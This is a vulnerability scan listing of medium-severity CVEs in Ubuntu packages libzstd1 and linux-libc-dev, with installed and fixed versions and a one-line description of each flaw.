Medium CVE-2019-11922 libzstd1 1.3.3+dfsg-2ubuntu11.3.3+dfsg-2ubuntu1.1A race condition in the one-pass compression functions of Zstandard pr ... libzstd1:1.3.3+dfsg-2ubuntu1
Medium CVE-2021-24031 libzstd1 1.3.3+dfsg-2ubuntu11.3.3+dfsg-2ubuntu1.2zstd: adds read permissions to files while being compressed or uncompressed libzstd1:1.3.3+dfsg-2ubuntu1
Medium CVE-2021-24032 libzstd1 1.3.3+dfsg-2ubuntu11.3.3+dfsg-2ubuntu1.2zstd: Race condition allows attacker to access world-readable destination file libzstd1:1.3.3+dfsg-2ubuntu1
Medium CVE-2017-13168 linux-libc-dev 4.15.0-24.264.15.0-39.42kernel: scsi: sg driver can improperly access userspace memory linux-libc-dev:4.15.0-24.26
Medium CVE-2018-1000200 linux-libc-dev 4.15.0-24.264.15.0-33.36kernel: NULL pointer dereference on OOM kill of large mlocked process linux-libc-dev:4.15.0-24.26
Medium CVE-2018-10853 linux-libc-dev 4.15.0-24.264.15.0-36.39kernel: kvm: guest userspace to guest kernel write linux-libc-dev:4.15.0-24.26
Medium CVE-2018-10902 linux-libc-dev 4.15.0-24.264.15.0-43.46kernel: MIDI driver race condition leads to a double-free linux-libc-dev:4.15.0-24.26
Medium CVE-2018-1093 linux-libc-dev 4.15.0-24.264.15.0-33.36kernel: Out of bounds read in ext4/balloc.c:ext4_valid_block_bitmap() causes crash with crafted ext4 image linux-libc-dev:4.15.0-24.26
Medium CVE-2018-1108 linux-libc-dev 4.15.0-24.264.15.0-33.36kernel: drivers: getrandom(2) unblocks too early after system boot linux-libc-dev:4.15.0-24.26
Medium CVE-2018-1120 linux-libc-dev 4.15.0-24.264.15.0-33.36kernel: fuse-backed file mmap-ed onto process cmdline arguments causes denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2018-11412 linux-libc-dev 4.15.0-24.264.15.0-33.36kernel: out-of-bounds memcpy in fs/ext4/inline.c:ext4_read_inline_data() with crafted ext4 image linux-libc-dev:4.15.0-24.26
Medium CVE-2018-11506 linux-libc-dev 4.15.0-24.264.15.0-33.36kernel: Stack-based buffer overflow in drivers/scsi/sr_ioctl.c allows denial of service or other unspecified impact linux-libc-dev:4.15.0-24.26
Medium CVE-2018-12232 linux-libc-dev 4.15.0-24.264.15.0-33.36kernel: NULL pointer dereference if close and fchownat system calls share a socket file descriptor linux-libc-dev:4.15.0-24.26
Medium CVE-2018-12233 linux-libc-dev 4.15.0-24.264.15.0-33.36kernel: Memory corruption in JFS setattr linux-libc-dev:4.15.0-24.26
Medium CVE-2018-13405 linux-libc-dev 4.15.0-24.264.15.0-33.36kernel: Missing check in fs/inode.c:inode_init_owner() does not clear SGID bit on non-directories for non-members linux-libc-dev:4.15.0-24.26
Medium CVE-2018-13406 linux-libc-dev 4.15.0-24.264.15.0-33.36kernel: Integer overflow in drivers/video/fbdev/uvesafb.c:uvesafb_setcmap() allows for potential denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2018-14625 linux-libc-dev 4.15.0-24.264.15.0-44.47kernel: use-after-free Read in vhost_transport_send_pkt linux-libc-dev:4.15.0-24.26
Medium CVE-2018-14633 linux-libc-dev 4.15.0-24.264.15.0-36.39kernel: stack-based buffer overflow in chap_server_compute_md5() in iscsi target linux-libc-dev:4.15.0-24.26
Medium CVE-2018-14678 linux-libc-dev 4.15.0-24.264.15.0-47.50xen: Uninitialized state in x86 PV failsafe callback path (XSA-274) linux-libc-dev:4.15.0-24.26
Medium CVE-2018-14734 linux-libc-dev 4.15.0-24.264.15.0-43.46kernel: use-after-free in ucma_leave_multicast in drivers/infiniband/core/ucma.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-16276 linux-libc-dev 4.15.0-24.264.15.0-43.46kernel: incorrect bounds checking in yurex_read in drivers/usb/misc/yurex.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-16658 linux-libc-dev 4.15.0-24.264.15.0-39.42kernel: Information leak in cdrom_ioctl_drive_status linux-libc-dev:4.15.0-24.26
Medium CVE-2018-16871 linux-libc-dev 4.15.0-24.264.15.0-46.49kernel: nfs: NULL pointer dereference due to an anomalized NFS message sequence linux-libc-dev:4.15.0-24.26
Medium CVE-2018-16882 linux-libc-dev 4.15.0-24.264.15.0-44.47Kernel: KVM: nVMX: use after free in posted interrupt processing linux-libc-dev:4.15.0-24.26
Medium CVE-2018-16884 linux-libc-dev 4.15.0-24.264.15.0-50.54kernel: nfs: use-after-free in svc_process_common() linux-libc-dev:4.15.0-24.26
Medium CVE-2018-17972 linux-libc-dev 4.15.0-24.264.15.0-44.47kernel: Unprivileged users able to inspect kernel stacks of arbitrary tasks linux-libc-dev:4.15.0-24.26
Medium CVE-2018-18021 linux-libc-dev 4.15.0-24.264.15.0-47.50kernel: Privilege escalation on arm64 via KVM hypervisor linux-libc-dev:4.15.0-24.26
Medium CVE-2018-18281 linux-libc-dev 4.15.0-24.264.15.0-44.47kernel: TLB flush happens too late on mremap linux-libc-dev:4.15.0-24.26
Medium CVE-2018-18397 linux-libc-dev 4.15.0-24.264.15.0-46.49kernel: userfaultfd bypasses tmpfs file permissions linux-libc-dev:4.15.0-24.26
Medium CVE-2018-18445 linux-libc-dev 4.15.0-24.264.15.0-43.46kernel: Faulty computation of numberic bounds in the BPF verifier linux-libc-dev:4.15.0-24.26
Medium CVE-2018-18690 linux-libc-dev 4.15.0-24.264.15.0-43.46kernel: filesystem corruption due to an unchecked error condition during an xfs attribute change linux-libc-dev:4.15.0-24.26
Medium CVE-2018-18710 linux-libc-dev 4.15.0-24.264.15.0-43.46kernel: Information leak in cdrom_ioctl_select_disc in drivers/cdrom/cdrom.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-18955 linux-libc-dev 4.15.0-24.264.15.0-42.45kernel: Privilege escalation in map_write() in kernel/user_namespace.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-19407 linux-libc-dev 4.15.0-24.264.15.0-44.47kernel: kvm: NULL pointer dereference in vcpu_scan_ioapic in arch/x86/kvm/x86.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-19854 linux-libc-dev 4.15.0-24.264.15.0-46.49kernel: Information Disclosure in crypto_report_one in crypto/crypto_user.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-20784 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: infinite loop in update_blocked_averages() in kernel/sched/fair.c leading to denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2018-20856 linux-libc-dev 4.15.0-24.264.15.0-58.64kernel: Use-after-free in __blk_drain_queue() function in block/blk-core.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-20976 linux-libc-dev 4.15.0-24.264.15.0-65.74kernel: use-after-free in fs/xfs/xfs_super.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-21008 linux-libc-dev 4.15.0-24.264.15.0-66.75kernel: use-after-free can be caused by the function rsi_mac80211_detach in the file drivers/net/wireless/rsi/rsi_91x_mac80211.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-25020 linux-libc-dev 4.15.0-24.264.15.0-166.174kernel: long jump over an instruction sequence can lead to overflow in the BPF subsystem linux-libc-dev:4.15.0-24.26
Medium CVE-2018-5383 linux-libc-dev 4.15.0-24.264.15.0-58.64kernel: Bluetooth implementations may not sufficiently validate elliptic curve parameters during Diffie-Hellman key exchange linux-libc-dev:4.15.0-24.26
Medium CVE-2018-5814 linux-libc-dev 4.15.0-24.264.15.0-33.36kernel: Race condition errors in USB over IP functionality can cause denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2018-6555 linux-libc-dev 4.15.0-24.264.15.0-36.39kernel: irda: use-after-free vulnerability in the hashbin list linux-libc-dev:4.15.0-24.26
Medium CVE-2018-9363 linux-libc-dev 4.15.0-24.264.15.0-39.42kernel: Buffer overflow in hidp_process_report linux-libc-dev:4.15.0-24.26
Medium CVE-2018-9415 linux-libc-dev 4.15.0-24.264.15.0-33.36kernel: race condition in the ARM Advanced Microcontroller Bus Architecture (AMBA) driver linux-libc-dev:4.15.0-24.26
Medium CVE-2018-9518 linux-libc-dev 4.15.0-24.264.15.0-34.37kernel: NFC: llcp: Out of bounds write in nfc_llcp_sdp_tlv struct in nfc/llcp_commands.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-0136 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: insufficient access control in the Intel(R) PROSet/Wireless WiFi Software driver may allow an unauthenticated user to potentially enable DoS via adjacent access linux-libc-dev:4.15.0-24.26
Medium CVE-2019-0145 linux-libc-dev 4.15.0-24.264.15.0-118.119Buffer overflow in i40e driver for Intel(R) Ethernet 700 Series Contro ... linux-libc-dev:4.15.0-24.26
Medium CVE-2019-0147 linux-libc-dev 4.15.0-24.264.15.0-118.119Insufficient input validation in i40e driver for Intel(R) Ethernet 700 ... linux-libc-dev:4.15.0-24.26
Medium CVE-2019-0148 linux-libc-dev 4.15.0-24.264.15.0-118.119Resource leak in i40e driver for Intel(R) Ethernet 700 Series Controll ... linux-libc-dev:4.15.0-24.26
Medium CVE-2019-0154 linux-libc-dev 4.15.0-24.264.15.0-69.78hw: Intel GPU Denial Of Service while accessing MMIO in lower power state linux-libc-dev:4.15.0-24.26
Medium CVE-2019-10126 linux-libc-dev 4.15.0-24.264.15.0-58.64kernel: Heap overflow in mwifiex_uap_parse_tail_ies function in drivers/net/wireless/marvell/mwifiex/ie.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-10207 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: null-pointer dereference in hci_uart_set_flow_control linux-libc-dev:4.15.0-24.26
Medium CVE-2019-10220 linux-libc-dev 4.15.0-24.264.15.0-88.88kernel: CIFS: Relative paths injection in directory entry lists linux-libc-dev:4.15.0-24.26
Medium CVE-2019-10638 linux-libc-dev 4.15.0-24.264.15.0-60.67Kernel: net: weak IP ID generation leads to remote device tracking linux-libc-dev:4.15.0-24.26
Medium CVE-2019-10639 linux-libc-dev 4.15.0-24.264.15.0-60.67Kernel: net: using kernel space address bits to derive IP ID may potentially break KASLR linux-libc-dev:4.15.0-24.26
Medium CVE-2019-11085 linux-libc-dev 4.15.0-24.264.15.0-55.60kernel: insufficient input validation in kernel mode driver in Intel i915 graphics leads to privilege escalation linux-libc-dev:4.15.0-24.26
Medium CVE-2019-11091 linux-libc-dev 4.15.0-24.264.15.0-50.54hardware: Microarchitectural Data Sampling Uncacheable Memory (MDSUM) linux-libc-dev:4.15.0-24.26
Medium CVE-2019-1125 linux-libc-dev 4.15.0-24.264.15.0-58.64kernel: hw: Spectre SWAPGS gadget vulnerability linux-libc-dev:4.15.0-24.26
Medium CVE-2019-11479 linux-libc-dev 4.15.0-24.264.15.0-54.58kernel: tcp: excessive resource consumption for TCP connections with low MSS allows remote denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2019-11599 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: fix race condition between mmget_not_zero()/get_task_mm() and core dumping linux-libc-dev:4.15.0-24.26
Medium CVE-2019-11815 linux-libc-dev 4.15.0-24.264.15.0-55.60kernel: race condition in rds_tcp_kill_sock in net/rds/tcp.c leading to use-after-free linux-libc-dev:4.15.0-24.26
Medium CVE-2019-11833 linux-libc-dev 4.15.0-24.264.15.0-55.60kernel: fs/ext4/extents.c leads to information disclosure linux-libc-dev:4.15.0-24.26
Medium CVE-2019-11884 linux-libc-dev 4.15.0-24.264.15.0-55.60kernel: sensitive information disclosure from kernel stack memory via HIDPCONNADD command linux-libc-dev:4.15.0-24.26
Medium CVE-2019-12818 linux-libc-dev 4.15.0-24.264.15.0-58.64kernel: null-pointer dereference in function nfc_llcp_build_tlv in net/nfc/llcp_commands.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-12819 linux-libc-dev 4.15.0-24.264.15.0-58.64kernel: use-after-free in function __mdiobus_register() in drivers/net/phy/mdio_bus.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-12881 linux-libc-dev 4.15.0-24.264.15.0-58.64kernel: NULL pointer dereference in i915_gem_userptr_get_pages allows local denial of service via crafted ioctl calls linux-libc-dev:4.15.0-24.26
Medium CVE-2019-12984 linux-libc-dev 4.15.0-24.264.15.0-58.64kernel: null pointer dereference in function nfc_genl_deactivate_target() in net/nfc/netlink.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-13233 linux-libc-dev 4.15.0-24.264.15.0-58.64kernel: use-after-free in arch/x86/lib/insn-eval.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-13272 linux-libc-dev 4.15.0-24.264.15.0-58.64kernel: broken permission and object lifetime handling for PTRACE_TRACEME linux-libc-dev:4.15.0-24.26
Medium CVE-2019-13648 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: denial of service in arch/powerpc/kernel/signal_32.c and arch/powerpc/kernel/signal_64.c via sigreturn() system call linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14283 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: integer overflow and OOB read in drivers/block/floppy.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14284 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: denial of service in drivers/block/floppy.c by setup_format_params division-by-zero linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14615 linux-libc-dev 4.15.0-24.264.15.0-76.86kernel: Intel graphics card information leak. linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14814 linux-libc-dev 4.15.0-24.264.15.0-66.75kernel: heap overflow in mwifiex_set_uap_rates() function of Marvell Wifi Driver leading to DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14815 linux-libc-dev 4.15.0-24.264.15.0-66.75kernel: heap-overflow in mwifiex_set_wmm_params() function of Marvell WiFi driver leading to DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14816 linux-libc-dev 4.15.0-24.264.15.0-66.75kernel: heap overflow in mwifiex_update_vs_ie() function of Marvell WiFi driver linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14821 linux-libc-dev 4.15.0-24.264.15.0-66.75Kernel: KVM: OOB memory access via mmio ring buffer linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14895 linux-libc-dev 4.15.0-24.264.15.0-74.84kernel: heap-based buffer overflow in mwifiex_process_country_ie() function in drivers/net/wireless/marvell/mwifiex/sta_ioctl.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14896 linux-libc-dev 4.15.0-24.264.15.0-74.84kernel: heap-based buffer overflow in lbs_ibss_join_existing function in drivers/net/wireless/marvell/libertas/cfg.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14897 linux-libc-dev 4.15.0-24.264.15.0-74.84kernel: stack-based buffer overflow in add_ie_rates function in drivers/net/wireless/marvell/libertas/cfg.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14901 linux-libc-dev 4.15.0-24.264.15.0-74.84kernel: heap overflow in marvell/mwifiex/tdls.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15030 linux-libc-dev 4.15.0-24.264.15.0-64.73kernel: powerpc: local user can read vector registers of other users' processes via a Facility Unavailable exception linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15031 linux-libc-dev 4.15.0-24.264.15.0-64.73kernel: powerpc: local user can read vector registers of other users' processes via an interrupt linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15090 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: An out-of-bounds read in drivers/scsi/qedi/qedi_dbg.c leading to crash or information disclosure linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15098 linux-libc-dev 4.15.0-24.264.15.0-69.78kernel: a NULL pointer dereference in drivers/net/wireless/ath/ath6kl/usb.c leads to a crash linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15099 linux-libc-dev 4.15.0-24.264.15.0-88.88kernel: a NULL pointer dereference in drivers/net/wireless/ath/ath10k/usb.c leads to a crash linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15117 linux-libc-dev 4.15.0-24.264.15.0-66.75kernel: out of bounds memory access in parse_audio_mixer_unit in sound/usb/mixer.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15118 linux-libc-dev 4.15.0-24.264.15.0-66.75kernel: mishandling recursion in sound/usb/mixer.c leading to kernel stack exhaustion and crash linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15666 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: out-of-bounds array access in __xfrm_policy_unlink linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15807 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: Memory leak in drivers/scsi/libsas/sas_expander.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15902 linux-libc-dev 4.15.0-24.264.15.0-66.75kernel: backporting error in ptrace_get_debugreg() linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15916 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: memory leak in register_queue_kobjects() in net/core/net-sysfs.c leads to denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15917 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: use-after-free in drivers/bluetooth/hci_ldisc.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15918 linux-libc-dev 4.15.0-24.264.15.0-66.75kernel: out-of-bounds read in fs/cifs/smb2pdu.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15921 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: memory leak in genl_register_family() in net/netlink/genetlink.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15924 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: null pointer dereference in drivers/net/ethernet/intel/fm10k/fm10k_main.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15926 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: out of bounds access in functions ath6kl_wmi_pstream_timeout_event_rx and ath6kl_wmi_cac_event_rx linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15927 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: out-of-bounds in function build_audio_procunit in sound/usb/mixer.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-16413 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: i_size_read() infinite loop leads to denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2019-16746 linux-libc-dev 4.15.0-24.264.15.0-72.81kernel: buffer-overflow hardening in WiFi beacon validation code. linux-libc-dev:4.15.0-24.26
Medium CVE-2019-16994 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: Memory leak in sit_init_net() in net/ipv6/sit.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-17052 linux-libc-dev 4.15.0-24.264.15.0-69.78kernel: unprivileged users able to create RAW sockets in the the AF_AX25 network protocol. linux-libc-dev:4.15.0-24.26
Medium CVE-2019-17053 linux-libc-dev 4.15.0-24.264.15.0-69.78kernel: unprivileged users able to create RAW sockets in AF_IEEE802154 network protocol linux-libc-dev:4.15.0-24.26
Medium CVE-2019-17054 linux-libc-dev 4.15.0-24.264.15.0-69.78kernel: privilege escalation in atalk_create in net/appletalk/ddp.c in the AF_APPLETALK network module linux-libc-dev:4.15.0-24.26
Medium CVE-2019-17055 linux-libc-dev 4.15.0-24.264.15.0-69.78kernel: unprivileged users able to create RAW sockets in AF_ISDN network protocol linux-libc-dev:4.15.0-24.26
Medium CVE-2019-17056 linux-libc-dev 4.15.0-24.264.15.0-69.78kernel: unprivileged access to llcp_sock_create in net/nfc/llcp_sock.c in the AF_NFC socket type. linux-libc-dev:4.15.0-24.26
Medium CVE-2019-17133 linux-libc-dev 4.15.0-24.264.15.0-72.81kernel: buffer overflow in cfg80211_mgd_wext_giwessid in net/wireless/wext-sme.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-17666 linux-libc-dev 4.15.0-24.264.15.0-69.78kernel: rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel lacks a certain upper-bound check, leading to a buffer overflow linux-libc-dev:4.15.0-24.26
Medium CVE-2019-18282 linux-libc-dev 4.15.0-24.264.15.0-74.84kernel: The flow_dissector feature allows device tracking linux-libc-dev:4.15.0-24.26
Medium CVE-2019-18660 linux-libc-dev 4.15.0-24.264.15.0-74.84kernel: powerpc: incomplete Spectre-RSB mitigation leads to information exposure linux-libc-dev:4.15.0-24.26
Medium CVE-2019-18675 linux-libc-dev 4.15.0-24.264.15.0-36.39kernel: integer overflow in cpia2_remap_buffer in drivers/media/usb/cpia2/cpia2_core.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19062 linux-libc-dev 4.15.0-24.264.15.0-88.88kernel: memory leak in the crypto_report() function in crypto/crypto_user_base.c allows for DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19332 linux-libc-dev 4.15.0-24.264.15.0-88.88Kernel: kvm: OOB memory write via kvm_dev_ioctl_get_cpuid linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19462 linux-libc-dev 4.15.0-24.264.15.0-109.110kernel: NULL pointer dereference in relay_open in kernel/relay.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19768 linux-libc-dev 4.15.0-24.264.15.0-99.100kernel: use-after-free in __blk_add_trace in kernel/trace/blktrace.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19807 linux-libc-dev 4.15.0-24.264.15.0-74.84kernel: use-after-free in sound/core/timer.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19922 linux-libc-dev 4.15.0-24.264.15.0-69.78kernel: when cpu.cfs_quota_us is used allows attackers to cause a denial of service against non-cpu-bound applications linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19927 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: Out-of-bounds read in ttm_put_pages in gpu/drm/ttm/ttm_page_alloc.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19965 linux-libc-dev 4.15.0-24.264.15.0-88.88kernel: NULL pointer dereference in drivers/scsi/libsas/sas_discover.c because of mishandling of port disconnection during discovery linux-libc-dev:4.15.0-24.26
Medium CVE-2019-20054 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: Null pointer dereference in drop_sysctl_table() in fs/proc/proc_sysctl.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-20095 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: memory leak in mwifiex_tm_cmd in drivers/net/wireless/marvell/mwifiex/cfg80211.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-20096 linux-libc-dev 4.15.0-24.264.15.0-88.88kernel: memory leak in __feat_register_sp() in net/dccp/feat.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-20636 linux-libc-dev 4.15.0-24.264.15.0-91.92kernel: out-of-bounds write via crafted keycode table linux-libc-dev:4.15.0-24.26
Medium CVE-2019-20812 linux-libc-dev 4.15.0-24.264.15.0-88.88kernel: af_packet: TPACKET_V3: invalid timer timeout on error linux-libc-dev:4.15.0-24.26
Medium CVE-2019-20908 linux-libc-dev 4.15.0-24.264.15.0-112.113kernel: lockdown: bypass through ACPI write via efivar_ssdt linux-libc-dev:4.15.0-24.26
Medium CVE-2019-20934 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: use-after-free in show_numa_stats function linux-libc-dev:4.15.0-24.26
Medium CVE-2019-2101 linux-libc-dev 4.15.0-24.264.15.0-58.64In uvc_parse_standard_control of uvc_driver.c, there is a possible out ... linux-libc-dev:4.15.0-24.26
Medium CVE-2019-2182 linux-libc-dev 4.15.0-24.264.15.0-91.92kernel: possible execution path in MMU code leads to local escalation of privilege linux-libc-dev:4.15.0-24.26
Medium CVE-2019-2213 linux-libc-dev 4.15.0-24.264.15.0-60.67In binder_free_transaction of binder.c, there is a possible use-after- ... linux-libc-dev:4.15.0-24.26
Medium CVE-2019-25045 linux-libc-dev 4.15.0-24.264.15.0-66.75kernel: use-after-free in the XFRM subsystem related to an xfrm_state_fini() panic linux-libc-dev:4.15.0-24.26
Medium CVE-2019-3459 linux-libc-dev 4.15.0-24.264.15.0-47.50kernel: Heap address information leak while using L2CAP_GET_CONF_OPT linux-libc-dev:4.15.0-24.26
Medium CVE-2019-3460 linux-libc-dev 4.15.0-24.264.15.0-47.50kernel: Heap address information leak while using L2CAP_PARSE_CONF_RSP linux-libc-dev:4.15.0-24.26
Medium CVE-2019-3846 linux-libc-dev 4.15.0-24.264.15.0-58.64kernel: Heap overflow in mwifiex_update_bss_desc_with_ie function in marvell/mwifiex/scan.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-3874 linux-libc-dev 4.15.0-24.264.15.0-50.54kernel: SCTP socket buffer memory leak leading to denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2019-3900 linux-libc-dev 4.15.0-24.264.15.0-60.67Kernel: vhost_net: infinite loop while receiving packets leads to DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2019-5108 linux-libc-dev 4.15.0-24.264.15.0-88.88kernel: triggering AP to send IAPP location updates for stations before the required authentication process has completed can lead to DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2019-5489 linux-libc-dev 4.15.0-24.264.15.0-60.67Kernel: page cache side channel attacks linux-libc-dev:4.15.0-24.26
Medium CVE-2019-6133 linux-libc-dev 4.15.0-24.264.15.0-46.49polkit: Temporary auth hijacking via PID reuse and non-atomic fork linux-libc-dev:4.15.0-24.26
Medium CVE-2019-6974 linux-libc-dev 4.15.0-24.264.15.0-47.50Kernel: KVM: potential use-after-free via kvm_ioctl_create_device() linux-libc-dev:4.15.0-24.26
Medium CVE-2019-7221 linux-libc-dev 4.15.0-24.264.15.0-47.50Kernel: KVM: nVMX: use-after-free of the hrtimer for emulation of the preemption timer linux-libc-dev:4.15.0-24.26
Medium CVE-2019-7222 linux-libc-dev 4.15.0-24.264.15.0-47.50Kernel: KVM: leak of uninitialized stack contents to guest linux-libc-dev:4.15.0-24.26
Medium CVE-2019-7308 linux-libc-dev 4.15.0-24.264.15.0-47.50kernel: eBPF: Spectre v1 mitigation bypass linux-libc-dev:4.15.0-24.26
Medium CVE-2019-8912 linux-libc-dev 4.15.0-24.264.15.0-47.50kernel: af_alg_release() in crypto/af_alg.c neglects to set a NULL value for a certain structure member, which leads to a use-after-free in sockfs_setattr linux-libc-dev:4.15.0-24.26
Medium CVE-2019-8980 linux-libc-dev 4.15.0-24.264.15.0-47.50kernel: memory leak in the kernel_read_file function in fs/exec.c allows to cause a denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2019-9213 linux-libc-dev 4.15.0-24.264.15.0-47.50kernel: lack of check for mmap minimum address in expand_downwards in mm/mmap.c leads to NULL pointer dereferences exploit on non-SMAP platforms linux-libc-dev:4.15.0-24.26
Medium CVE-2019-9458 linux-libc-dev 4.15.0-24.264.15.0-58.64kernel: use after free due to race condition in the video driver leads to local privilege escalation linux-libc-dev:4.15.0-24.26
Medium CVE-2019-9500 linux-libc-dev 4.15.0-24.264.15.0-50.54kernel: brcmfmac heap buffer overflow in brcmf_wowl_nd_results linux-libc-dev:4.15.0-24.26
Medium CVE-2019-9503 linux-libc-dev 4.15.0-24.264.15.0-50.54kernel: brcmfmac frame validation bypass linux-libc-dev:4.15.0-24.26
Medium CVE-2019-9506 linux-libc-dev 4.15.0-24.264.15.0-60.67hardware: bluetooth: BR/EDR encryption key negotiation attacks (KNOB) linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0067 linux-libc-dev 4.15.0-24.264.15.0-106.107kernel: out of bounds read due to a missing bounds check in f2fs_xattr_generic_list of xattr.c leading to local information disclosure linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0305 linux-libc-dev 4.15.0-24.264.15.0-91.92kernel: possible use-after-free due to a race condition in cdev_get of char_dev.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0404 linux-libc-dev 4.15.0-24.264.15.0-96.97kernel: avoid cyclic entity chains due to malformed USB descriptors linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0427 linux-libc-dev 4.15.0-24.264.15.0-88.88kernel: out-of-bounds reads in pinctrl subsystem. linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0430 linux-libc-dev 4.15.0-24.264.15.0-44.47kernel: possible out-of-bounds read in skb_headlen of /include/linux/skbuff.h linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0431 linux-libc-dev 4.15.0-24.264.15.0-91.92kernel: possible out of bounds write in kbd_keycode of keyboard.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0432 linux-libc-dev 4.15.0-24.264.15.0-96.97kernel: possible out of bounds write in skb_to_mamac of networking.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0433 linux-libc-dev 4.15.0-24.264.15.0-101.102In blk_mq_queue_tag_busy_iter of blk-mq-tag.c, there is a possible use ... linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0444 linux-libc-dev 4.15.0-24.264.15.0-99.100kernel: bad kfree in auditfilter.c may lead to escalation of privilege linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0465 linux-libc-dev 4.15.0-24.264.15.0-126.129kernel: out of bounds write in hid-multitouch.c may lead to escalation of privilege linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0466 linux-libc-dev 4.15.0-24.264.15.0-121.123kernel: use after free in eventpoll.c may lead to escalation of privilege linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10135 linux-libc-dev 4.15.0-24.264.15.0-129.132kernel: bluetooth: BR/EDR Bluetooth Impersonation Attacks (BIAS) linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10690 linux-libc-dev 4.15.0-24.264.15.0-88.88kernel: use-after-free in cdev_put() when a PTP device is removed while it's chardev is open linux-libc-dev:4.15.0-24.26
